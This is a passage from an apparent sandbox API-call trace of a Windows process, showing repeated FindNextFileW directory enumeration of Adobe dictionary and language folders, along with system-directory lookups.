lpOldMode=0x2af0cc) returned 1 [0147.817] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8287550, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe8287550, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe8287550, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.818] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8287550, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe8287550, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe8287550, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0147.818] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af08c) returned 1 [0147.818] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af098) returned 1 [0147.818] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0147.818] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0147.819] CoTaskMemFree (pv=0x4e1c10) [0147.819] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af15c) returned 1 [0147.819] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.820] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dictionaries", cAlternateFileName="DICTIO~1")) returned 1 [0147.820] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dictionaries", cAlternateFileName="DICTIO~1")) returned 0 [0147.820] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0147.821] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af128) returned 1 [0147.821] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af15c) returned 1 [0147.821] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.821] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dictionaries", cAlternateFileName="DICTIO~1")) returned 1 [0147.822] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0147.822] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0147.822] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af128) returned 1 [0147.822] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0147.822] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0147.823] CoTaskMemFree (pv=0x4e1c10) [0147.823] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af114) returned 1 [0147.824] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.825] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adobe Custom Dictionary", cAlternateFileName="ADOBEC~1")) returned 1 [0147.825] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adobe Custom Dictionary", cAlternateFileName="ADOBEC~1")) returned 0 [0147.825] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0147.825] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e0) returned 1 [0147.826] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af114) returned 1 [0147.826] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.826] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adobe Custom Dictionary", cAlternateFileName="ADOBEC~1")) returned 1 [0147.826] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0147.827] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0147.827] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e0) returned 1 [0147.827] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0147.827] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0147.827] CoTaskMemFree (pv=0x4e1c10) [0147.828] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0cc) returned 1 [0147.830] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.830] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="all", cAlternateFileName="")) returned 1 [0147.830] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeab70f70, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeab70f70, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeab70f70, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="brt", cAlternateFileName="")) returned 1 [0147.830] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec6bf330, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="brz", cAlternateFileName="")) returned 1 [0147.831] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb4758f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb4758f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb4758f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="dan", cAlternateFileName="")) returned 1 [0147.831] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xebdabf50, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xebdabf50, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xebdabf50, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="dut", cAlternateFileName="")) returned 1 [0147.831] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9487bb0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9487bb0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9487bb0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="eng", cAlternateFileName="")) returned 1 [0147.831] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9d9af90, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9d9af90, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9d9af90, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="frn", cAlternateFileName="")) returned 1 [0147.832] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9924650, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9924650, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9924650, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="grm", cAlternateFileName="")) returned 1 [0147.832] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea6d44d0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea6d44d0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea6d44d0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="itl", cAlternateFileName="")) returned 1 [0147.832] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb90f4b0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb90f4b0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb90f4b0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nrw", cAlternateFileName="")) returned 1 [0147.832] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec2489f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec2489f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec2489f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="prt", cAlternateFileName="")) returned 1 [0147.833] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea237a30, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea237a30, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea237a30, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="spn", cAlternateFileName="")) returned 1 [0147.833] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeaffa190, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeaffa190, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeaffa190, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="swd", cAlternateFileName="")) returned 1 [0147.833] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeaffa190, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeaffa190, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeaffa190, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="swd", cAlternateFileName="")) returned 0 [0147.834] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af08c) returned 1 [0147.834] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af098) returned 1 [0147.834] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0cc) returned 1 [0147.835] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.836] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="all", cAlternateFileName="")) returned 1 [0147.836] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeab70f70, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeab70f70, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeab70f70, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="brt", cAlternateFileName="")) returned 1 [0147.836] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec6bf330, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="brz", cAlternateFileName="")) returned 1 [0147.836] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb4758f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb4758f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb4758f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="dan", cAlternateFileName="")) returned 1 [0147.837] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xebdabf50, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xebdabf50, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xebdabf50, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="dut", cAlternateFileName="")) returned 1 [0147.837] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9487bb0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9487bb0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9487bb0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="eng", cAlternateFileName="")) returned 1 [0147.837] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9d9af90, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9d9af90, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9d9af90, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="frn", cAlternateFileName="")) returned 1 [0147.837] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9924650, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9924650, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9924650, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="grm", cAlternateFileName="")) returned 1 [0147.838] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea6d44d0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea6d44d0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea6d44d0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="itl", cAlternateFileName="")) returned 1 [0147.838] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb90f4b0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb90f4b0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb90f4b0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nrw", cAlternateFileName="")) returned 1 [0147.838] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec2489f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec2489f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec2489f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="prt", cAlternateFileName="")) returned 1 [0147.838] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea237a30, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea237a30, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea237a30, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="spn", cAlternateFileName="")) returned 1 [0147.839] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeaffa190, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeaffa190, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeaffa190, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="swd", cAlternateFileName="")) returned 1 [0147.839] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, 